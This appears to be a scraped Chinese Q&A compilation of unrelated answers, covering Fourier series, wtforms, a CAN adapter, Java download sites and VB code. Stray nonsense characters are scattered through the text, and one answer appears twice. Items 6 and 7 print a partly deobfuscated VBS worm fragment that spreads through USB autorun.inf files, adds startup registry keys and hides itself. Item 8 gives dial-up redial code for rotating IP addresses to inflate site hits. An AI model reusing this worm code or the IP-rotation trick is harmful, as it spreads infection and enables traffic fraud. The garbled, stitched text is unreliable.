1. 如何用matlab把傅里葉級數的三角形式轉變成指數形式要源代碼
1.之所以引入復信號[有虛部],並不是因為實際存在復信號;如同δ函數一樣,實襪彎際並不存在,但是作為數學分析的角度,引入後能方便分析信號。而傅里葉級數的指數形式和傅里葉變換,都是把信號分解為e^jwt的組合。把這個數學方法用在實信號,當然是正確的,於是有傅里葉級數的三角形式。實際中實信號的頻率分量的頻率都是非負的,在數學形式上需要一正一負的e^jwt才得到實的正弦分量,所以實信號的頻譜總是雙邊春兆的頻譜,實信號的頻譜的幅度是偶的,相位是奇函數。總之,用e^jwt後,數學分析最簡單。把實信號進行變換分解為cos,sin分量的積分變換是需要2個計算公式,而把信號分解為e^jwt的只要一個公式。
說到這里你應該明白 為什麼引入復信號了吧?另外e^jwt作用在LTI系統上產生的零狀態響應是特別的簡單,在這個基礎上就可以得出 coswt作用在LTI 實 系統上產生的零狀態響應了。
2.交流電路中,雖然有相量,表面看是復數,但是他卻表示一個正弦信號;如90<45°,90表示正弦的振幅,45表示相位,即表示90cos(wt+45°),這點可以理解吧?
那麼為什麼可以這樣表示呢?首先理解:90cos(wt+45°)是實信號,電路也是實系統[實際中只有實信號和實系統],於是電流或電壓響應也是實的;於是90cos(wt+45°)作為復信號 90e^(wt+45°)的實部,90e^j(wt+45°)經過系統後的響應為 90e^j(wt+45°)H(jw);
還是個復信號,但是響應也是實的,所以他等於 90e^j(wt+45°)H(jw)的實部。假設90e^j(wt+45°)是電流,即90cos(wt+45°),他經過1+jw的阻抗[相當於系統頻率響應],那麼,設w=1;該阻抗上的電壓是: 90e^j(t+45°)H(j1)=...=90√2e^j(t+45°+45°),寫成相量形式為90√2<90°,轉告森悶換成90√2cos(t+90°),而這個正是響應的實部呀。
也就是說,相量A<θ是用來表示Acos(wt+θ),並不是復信號,....
2. wtforms.validators中的Regexp驗證函數的flags參數有什麼作用
flags參數在re模塊的文檔中是這樣描述的:
Values can be any of the following variables, combined using bitwise OR (the | operator).
這些常量可以使用位或運算符悔攜來同時使用,默認值為0,表示不使用任何標志蔽前鬧常量宏罩,for example也就說的通了。
正如源碼所示,如果regex不是字元串,那麼也就沒有編譯的步驟了,那麼這些參數自然會被忽略。
3. 橫河測試測量的WT-CAN通信適配器主要功能和規格是什麼
橫河測試測量的WT-CAN通信適配器主要功能和規格:1、支持WT5000和WT1800E兩款功率分析儀;2、支持CAN2.0A/2.0B通信塵團協議;3、最多支持約210個功率參數同時傳輸;4、正陵可派清橘生成DBC文件,直接將功率參數導出到測試系統(軟體);5、可通過CAN匯流排遠程對功率分析儀進行常用設定和操作。
4. STARWT 5000終端上怎麼建立網頁
STARWT-5000型Windows終端缺銀產品建立網頁這個倒不是很麻煩的,但在網上一兩伏昌宴句文字話也說不清楚,建議上些學習論壇看圖文並茂的迅畝教程.
5. 哪些網站可以免費下載java源碼
世紀站長網 http://wt.21codes.com/Soft/pro/JAVAcode/
盟動力源碼 http://www.tomore.com/java/
365源碼之家 http://www.365code.com/sort/353_1.htm
天新網 http://www.21tx.com/src/java/
豆豆源碼 http://code.ddvip.com/list/257.html
這樣的網站多了,去看看吧。
6. cm 03-04 運行全是亂碼,代碼如何添加
你好
這個是vbs腳本病毒,看上去是亂碼,一點也看不懂,其實還是有跡可循的。其思路就是尋 找"execute"關鍵詞。病毒最終,還是要換成機器可以看懂的內容,也就是說,最後一層的execute裡面的內容,就是病毒的源代碼。按照這個思路,那麼可以知道,解密方法也此閉悔一定就在這個execute裡面。
也就是說:無需明白他是如何加密的森正,只需要知道,execute出來的是什麼。
按照這個思路,可以得到程序的最後一次迭代加密過程前的代碼,也就是第一次迭代解密的代碼,看上去還是亂碼,不過還是同樣的道理,總可以找到execute這個關鍵詞。病毒可能經過多次迭代,不過最終還是可以看懂的。
需要注意的是,execute後面的內容解密出來如果真的用execute執行了,那就中招了,所以這里要注意不能把execute也放進去一起執行。
以下是我的解密最終代碼片斷
這個程序作者比較BT,手工加密了很多地方,還手工打亂了代碼,嚴重妨礙了程序可讀性。
分析完代碼其大致功能是
1。開機自啟動
2。U盤的感染
3。破壞系統隱藏功能
on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromwin32_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schele'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len (wscript.scriptname))
cnr="態汪\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr (cnp,0):if cna="" then cna=til
wsc="wscript.exe":csc="cscript.exe":css=csc&" //nologo ":wsr=rn&":createobject (""wscript.shell"").run"
c=vbcrlf:inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr ("HKCU"&rop&sf&"desktop",0)&j
rpa="HKLM\software\"&cna&j:fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr ("HKCU"&rop&sf&"favorites",0)&j
ht=ec("ivwt?56"):ha=ec(":;9:7>5kw9"):hb=hl&"1;<<=6x"&hl&"r;":hc="0dwuEpE":hd=ec
("$"+hc):he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\":rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna
hip="HKCU"&rop&"advanced\showsuperhidden":sz=lcase(fso.getfilename(wscript.fullname)):if mir=dir then sys=true
for each si in
sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then
hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):ver=gv(ouw):if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1
else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er 10
else
wscript.sleep 5000
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
由於VBS與JS一樣是解釋型語言,代碼自上而下,一行一行地運行。所以解這類代碼的一個技巧是:
我們尋找解密入口點時,應該優先考慮最後一個execute。作者大量使用邏輯拼接。。。屬於很BT的加密。。。汗水...
7. 我去列印房列印,u盤上中了這個.vbs的病毒,用記事本打開全是亂碼,求解密之後的源代碼````
你好
這個是vbs腳本病毒,看上去是亂碼,一點也看不懂,其實還是有跡可循的。其思路就是尋 找"execute"關鍵詞。病毒最終,還是要換成機器可以看懂的內容,也就是說,最後一層的execute裡面的內容,就是病毒的源代碼。按照這個思路,那麼可以知道,解密方法也一定就在這個execute裡面。
也就是說:無需明白他是如何加密的,只需要知道,execute出來的是什麼。
按照這個思路,渣簡衫可以得到程序的最後一次迭代加密過程前的代碼,也就是第一次迭代解密的代碼,看上去還是亂碼,不過還是同樣的道理,總可以找到execute這個關鍵詞。病毒可能經過多次迭代,不過最終還是可以看懂的。
需要注意的是,execute後面的內容解密出來如果真的用execute執行了,那就中招了,所以這里要注意不能把execute也放進去一起執行。
以下是我的解密最終代碼片斷
這個程序作者比較BT,手工加密了很多地方,還手工打亂了代碼,嚴重妨礙了程序可讀性。
分析完代碼其大致功能是
1。開機自啟動
2。U盤的感染
3。破壞咐檔系統隱藏功能
on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromwin32_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schele'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len (wscript.scriptname))
cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr (cnp,0):if cna="" then cna=til
wsc="wscript.exe":csc="cscript.exe":css=csc&" //nologo ":wsr=rn&":createobject (""wscript.shell"").run"
c=vbcrlf:inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr ("HKCU"&rop&sf&"desktop",0)&j
rpa="HKLM\software\"&cna&j:fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr ("HKCU"&rop&sf&"favorites"如腔,0)&j
ht=ec("ivwt?56"):ha=ec(":;9:7>5kw9"):hb=hl&"1;<<=6x"&hl&"r;":hc="0dwuEpE":hd=ec
("$"+hc):he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\":rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna
hip="HKCU"&rop&"advanced\showsuperhidden":sz=lcase(fso.getfilename(wscript.fullname)):if mir=dir then sys=true
for each si in
sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then
hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):ver=gv(ouw):if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1
else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er 10
else
wscript.sleep 5000
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
由於VBS與JS一樣是解釋型語言,代碼自上而下,一行一行地運行。所以解這類代碼的一個技巧是:
我們尋找解密入口點時,應該優先考慮最後一個execute。作者大量使用邏輯拼接。。。屬於很BT的加密。。。汗水...
8. ip代理刷網址 VB或易語言啊!什麼的都行 要源碼!
代理IP太麻煩,如果你用的是ADSL寬頻,可以參照以下代碼:
Option Explicit
Private Declare Function RasHangUp Lib "RasApi32.dll" Alias "RasHangUpA" (ByVal hRasConn As Long) As Long
Private Declare Function RasEnumConnections Lib "RasApi32.dll" Alias "RasEnumConnectionsA" (lprasconn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Declare Function RasGetConnectStatus Lib "RasApi32.dll" Alias "RasGetConnectStatusA" (ByVal hRasCon As Long, lpStatus As Any) As Long
Const RAS95_MaxEntryName = 256
Const RAS95_MaxDeviceName = 128
Const RAS_MaxDeviceType = 16
Const RAS95_MaxDeviceType = 16
Private Type RASCONN95
'set dwsize to 412
dwSize As Long
hRasConn As Long
szEntryName(RAS95_MaxEntryName) As Byte
szDeviceType(RAS_MaxDeviceType) As Byte
szDeviceName(RAS95_MaxDeviceName) As Byte
End Type
Private Type RASCONNSTATUS95
dwSize As Long
RasConnState As Long
dwError As Long
szDeviceType(RAS95_MaxDeviceType) As Byte
szDeviceName(RAS95_MaxDeviceName) As Byte
End Type
Const INTERNET_DIALSTATE_DISCONNECTED = 1
Const INTERNET_AUTODIAL_FORCE_ONLINE = 1
Const INTERNET_AUTODIAL_FORCE_UNATTENDED = 2
Const INTERNET_DIAL_UNATTENDED = &H8000
Dim iHandle As Long
Private Declare Function InternetDial Lib "wininet.dll" ( _
ByVal hwndParent As Long, _
ByVal lpszConnectoid As String, _
ByVal dwFlags As Long, _
lpdwConnection As Long, _
ByVal dwReserved As Long) As Long
'參數dwConnection指定撥號連接句柄
Private Declare Function InternetHangUp Lib "wininet.dll" _
(ByVal dwConnection As Long, _
ByVal dwReserved As Long) As Long
'斷開
Public Sub CloseConnected()
Dim lngRetCode As Long
Dim lpcb As Long
Dim lpcConnections As Long
Dim intArraySize As Integer
Dim intLooper As Integer
ReDim lprasconn95(intArraySize) As RASCONN95
lprasconn95(0).dwSize = 412
lpcb = 256 * lprasconn95(0).dwSize
lngRetCode = RasEnumConnections(lprasconn95(0), lpcb, lpcConnections)
If lngRetCode = 0 Then
If lpcConnections > 0 Then
For intLooper = 0 To lpcConnections - 1
RasHangUp lprasconn95(intLooper).hRasConn
Next intLooper
Else
MsgBox "沒有撥號網路連接!", vbInformation
End If
End If
End Sub
'檢測
Public Function IsConnected() As Boolean '返回T時為連接
Dim TRasCon(255) As RASCONN95
Dim lg As Long
Dim lpcon As Long
Dim RetVal As Long
Dim Tstatus As RASCONNSTATUS95
'
TRasCon(0).dwSize = 412
lg = 256 * TRasCon(0).dwSize
'
RetVal = RasEnumConnections(TRasCon(0), lg, lpcon)
If RetVal <> 0 Then
MsgBox "產生錯誤!", vbInformation, "提示"
Exit Function
End If
'
Tstatus.dwSize = 160
RetVal = RasGetConnectStatus(TRasCon(0).hRasConn, Tstatus)
If Tstatus.RasConnState = &H2000 Then
IsConnected = True
Else
IsConnected = False
End If
End Function
'撥號
Public Function AddConnected()
'建立名稱為wt的連接,連接成功後連接句柄保存在iHandel中
InternetDial Form1.hWnd, "wt", INTERNET_AUTODIAL_FORCE_UNATTENDED, iHandle, 0
End Function
Private Sub Command1_Click()
Dim x As String
x = AddConnected()
End Sub
Private Sub Command2_Click()
Call CloseConnected
End Sub
Private Sub Command3_Click()
Dim k As Boolean
If IsConnected() = True Then
MsgBox ("OK")
Else
MsgBox ("No")
End If
End Sub
Private Sub Form_Activate()
Me.Hide
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
If IsConnected() = False Then
Command1_Click '連接
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Set Form1 = Nothing
End Sub
Private Sub Timer1_Timer()
Command2_Click '斷開
Unload Me
Form2.Show
End Sub